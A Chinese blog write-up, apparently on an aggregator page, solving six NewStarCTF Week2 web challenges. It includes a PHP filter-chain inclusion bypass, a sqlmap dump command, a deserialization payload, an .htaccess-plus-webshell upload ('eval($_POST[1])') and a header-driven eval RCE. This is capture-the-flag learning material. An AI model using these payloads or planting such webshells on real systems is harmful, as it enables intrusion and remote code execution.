当前位置：首页 > news >正文

【Web】NewStarCtf Week2 个人复现

news 2026/2/9 9:56:20

①游戏高手

②include 0。0

③ez_sql

④Unserialize？

⑤Upload again!

⑥ R!!C!!E!!

①游戏高手

经典前端js小游戏

检索与分数相关的变量

控制台直接修改分数拿到flag

②include 0。0

禁了base64和rot13

尝试过包含/var/log/apache/access.log,php://input和data://均不行

没法子，只能上网检索别的过滤器了

payload

?file=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php

③ez_sql

在url发现注入点

sqlmap梭了

python sqlmap.py -u "http://946dccab-ab98-4042-9583-64c9f46eaf8f.node4.buuoj.cn:81/?id=TMP0919" -D ctf -T here_is_flag -C flag --dump

④Unserialize？

构造:

<?phpclass evil {private $cmd = 'ls /';
}
$a = new evil();
echo (serialize($a));

不可见字符用%00代替

payload:

unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:4:"ls /";}
unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:33:"nl /th1s_1s_fffflllll4444aaaggggg";}

⑤Upload again!

经过尝试不能上传php文件（后缀检测绕不过）

随便输一段报错发现是apache

上传.htaccess

#define width 100;
#define height 100;
SetHandler application/x-httpd-php

上传yjh.png

GIF89a
<script language="php">eval($_POST[1]);</script>

回显路径，访问连蚁剑即可

⑥ R!!C!!E!!

进来先让信息搜集

盲测/.git/，报Forbidden,说明是.git源码泄露

一眼无参rce，过滤了一些东西

先打打看

/bo0g1pop.php?star=print_r(getallheaders());

回显

发现UA在第二个

payload:

/bo0g1pop.php?star=eval(next(getallheaders()));

改UA即可

【Web】NewStarCtf Week2 个人复现

目录 ①游戏高手 ②include 0。0 ③ez_sql ④Unserialize？ ⑤Upload again! ⑥ R!!C!!E!! ①游戏高手经典前端js小游戏检索与分数相关的变量控制台直接修改分数拿到flag ②include 0。0 禁了base64和rot13 尝试过包含/var/log/apache/access.log,ph…...

编程日记 2023/11/29 0:22:30

Python实现Windows服务自启动、禁用、启动、停止、删除

如果一个程序被服务监管，那么仅仅kill程序是无用的，还要把服务关掉 import win32service import win32serviceutildef EnableService(service_name):try:# 获取服务管理器scm win32service.OpenSCManager(None, None, win32service.SC_MANAGER_ALL_ACC…...

编程日记 2023/11/29 0:21:27

【华为OD题库-043】二维伞的雨滴效应-java

题目普通的伞在二维平面世界中，左右两侧均有一条边，而两侧伞边最下面各有一个伞坠子，雨滴落到伞面，逐步流到伞坠处，会将伞坠的信息携带并落到地面，随着日积月累，地面会呈现伞坠的信息。 1、为了…...

编程日记 2023/11/29 0:20:27

百度手机浏览器关键词排名优化——提升关键词排名开源百度小程序源码系统附带完整的搭建教程

百度作为国内领先的搜索引擎，一直致力于为用户提供最优质的信息服务。在移动互联网时代，手机浏览器成为了用户获取信息的主要渠道。而小程序作为轻量级的应用程序，具有即用即走、无需下载等优势，越来越受到用户的青睐。然而&#…...

编程日记 2023/11/29 0:19:25

Git 的基本概念和使用方式。

Git 是一个开源的分布式版本控制系统，它可以记录代码的修改历史，跟踪文件的版本变化，并支持多人协同开发。Git 的基本概念包括： 1. 仓库（Repository）：存放代码和版本历史记录的地方。 2. 分支…...

编程日记 2023/11/29 0:18:24

MarkDown学习

MarkDown学习标题三级标题四级标题字体加粗（两侧加两个星号）：Hello，World! 斜体（两侧加一个星号）：Hello，World! 加粗加斜体（两侧加三个星号）&#xff1a…...

编程日记 2023/11/29 0:17:23

案例：某电子产品电商平台借助监控易保障网络正常运行

一、背景介绍某电子产品电商平台是一家专注于电子产品销售的电商平台，拥有庞大的用户群体和丰富的产品线。随着业务规模的不断扩大，网络设备的数量和复杂性也不断增加，网络故障和性能问题时有发生，给平台的稳定运行带来了很大的挑…...

编程日记 2023/11/29 0:16:22

IntelliJ IDEA 中有什么让你相见恨晚的技巧

一、条件断点循环中经常用到这个技巧，比如：遍历1个大List的过程中，想让断点停在某个特定值。参考上图，在断点的位置，右击断点旁边的小红点，会出来一个界面，在Condition这里填入断点条件即可&…...

编程日记 2023/11/29 0:15:22

游戏被攻击了怎么办

随着网络技术和网络应用的发展，网络安全问题显得越来越重要，在创造一个和谐共赢的互联网生态环境的路途中总是会遇到各种各样的问题。最常见的当属于DDOS攻击（Distributed Denial of Service）即分布式阻断服务。由于容易实施、难以…...

编程日记 2023/11/29 0:14:21

MySQL 索引类型

什么是索引？ 索引是一种用于提高数据库查询性能的数据结构。它是在表中一个或多个列上创建的，可以加快对这些列的数据检索速度。索引的作用是通过创建一个额外的数据结构，使得数据库可以更快地定位和访问数据。当执行查询语句时&#xff0c…...

编程日记 2023/11/29 0:13:20

哈希表——闭散列表

该哈希表实现是闭散列实现法。闭散列表： 闭散列：也叫开放定址法，当发生哈希冲突时，如果哈希表未被装满，说明在哈希表中必然还有空位置，那么可以把key存放到冲突位置中的“下一个” 空位置中去。那如何寻…...

编程日记 2023/11/29 0:12:19

【ArcGIS Pro微课1000例】0036：栅格影像裁剪与提取（矢量范围裁剪dem高程数据）

本实验讲解在ArcGIS Pro中进行栅格影像裁剪与提取（矢量范围裁剪dem高程数据）的方法。DEM、DOM、DSM等栅格数据方法也可以实现。文章目录一、加载实验数据二、裁剪工具的使用1. 裁剪栅格2. 按掩膜提取一、加载实验数据加载配套实验数据包中的0036.rar中的dem数据和矢量裁剪…...

编程日记 2023/11/29 0:11:18

Doris-Routine Load（二十七）

例行导入（Routine Load）功能为用户提供了一种自动从指定数据源进行数据导入的功能。适用场景当前仅支持从 Kafka 系统进行例行导入，使用限制： （1）支持无认证的 Kafka 访问，以及通过 SSL 方…...

编程日记 2023/11/29 0:10:17

linux驱动.之网络udp应用层测试工具demon（一）

绑定vlan，网卡的demon，如果有多个网卡，多个vlan，网卡的ip设置成一致，那就不能只简单绑定ip来创建socket， 需要绑定网卡设备客户端udp_client.c #include <stdio.h> #include <string.h> #inc…...

编程日记 2023/11/29 0:09:15

【Flutter】graphic图表的快速上手

简介 graphic是一个数据可视化语法和Flutter图表库。官方github示例网上可用资源很少，只有作者的几篇文章，并且没有特别详细的文档，使用的话还是需要一定的时间去调研，在此简单记录。示例以折线图为例（因为我只用到了折线图，但其他的图大差不差）创建一个两个文…...

编程日记 2023/11/29 0:08:15

DeepMind 推出 OPRO 技术，可用于优化 ChatGPT 提示

本心、输入输出、结果文章目录 DeepMind 推出 OPRO 技术，可用于优化 ChatGPT 提示前言消息摘要OPRO的工作原理DeepMind的研究相关链接花有重开日，人无再少年实践是检验真理的唯一标准 DeepMind 推出 OPRO 技术，可用于优化 ChatGPT 提示编辑…...

编程日记 2023/11/29 0:07:13

企业网络中的身份安全

随着近年来数字化转型的快速发展，企业使用的数字身份数量急剧增长。身份不再仅仅局限于用户。它们现在扩展到设备、应用程序、机器人、第三方供应商和组织中员工以外的其他实体。即使在用户之间，也存在不同类型的身份，例如属于IT管理员、远程…...

编程日记 2023/11/29 0:06:12

智能优化算法应用：基于正余弦算法无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用：基于正余弦算法无线传感器网络(WSN)覆盖优化 - 附代码文章目录智能优化算法应用：基于正余弦算法无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.正余弦算法4.实验参数设定5.算法结果6.参考文献7.…...

编程日记 2023/11/29 0:04:10

创建一个带有背景图层和前景图层的渲染窗口

开发环境： Windows 11 家庭中文版Microsoft Visual Studio Community 2019VTK-9.3.0.rc0vtk-example demo解决问题： 创建一个带有背景图层和前景图层的渲染窗口，知识点：1. 画布转image；2. 渲染图层设置；3.…...

编程日记 2023/11/29 0:02:08

Docker 运行 Oracle Autonomous Database Free Container

Docker 运行 Oracle Autonomous Database Free Container Oracle Autonomous Database Free Container Image 介绍通过 Docker 运行 Oracle Autonomous Database Free ContainerWallet 配置可用的 TNS 别名MY_ATP TNS 别名MY_ADW TNS 别名连接到 Oracle Autonomous Databas…...

编程日记 2023/11/29 0:01:07

KubeSphere 容器平台高可用：环境搭建与可视化操作指南

Linux_k8s篇欢迎来到Linux的世界，看笔记好好学多敲多打，每个人都是大神！ 题目：KubeSphere 容器平台高可用：环境搭建与可视化操作指南版本号: 1.0,0 作者: 老王要学习日期: 2025.06.05 适用环境: Ubuntu22 文档说…...

编程新知 2026/2/8 15:03:14

＜6＞-MySQL表的增删查改

目录一，create（创建表） 二，retrieve（查询表） 1，select列 2，where条件三，update（更新表） 四，delete（删除表&#xf…...

编程新知 2025/12/11 18:28:17

LLM基础1_语言模型如何处理文本

基于GitHub项目：https://github.com/datawhalechina/llms-from-scratch-cn 工具介绍 tiktoken：OpenAI开发的专业"分词器" torch：Facebook开发的强力计算引擎，相当于超级计算器理解词嵌入：给词语画"…...

编程新知 2025/9/25 5:16:24

【RockeMQ】第2节｜RocketMQ快速实战以及核⼼概念详解（二）

升级Dledger高可用集群一、主从架构的不足与Dledger的定位主从架构缺陷数据备份依赖Slave节点，但无自动故障转移能力，Master宕机后需人工切换，期间消息可能无法读取。Slave仅存储数据，无法主动升级为Master响应请求&#xff…...

编程新知 2025/9/2 3:37:40

R语言速释制剂QBD解决方案之三

本文是《Quality by Design for ANDAs: An Example for Immediate-Release Dosage Forms》第一个处方的R语言解决方案。第一个处方研究评估原料药粒径分布、MCC/Lactose比例、崩解剂用量对制剂CQAs的影响。第二处方研究用于理解颗粒外加硬脂酸镁和滑石粉对片剂质量和可生产…...

编程新知 2026/2/9 2:43:24

QT3D学习笔记——圆台、圆锥

类名作用Qt3DWindow3D渲染窗口容器QEntity场景中的实体（对象或容器）QCamera控制观察视角QPointLight点光源QConeMesh圆锥几何网格QTransform控制实体的位置/旋转/缩放QPhongMaterialPhong光照材质（定义颜色、反光等）QFirstPersonC…...

编程新知 2026/1/29 5:26:37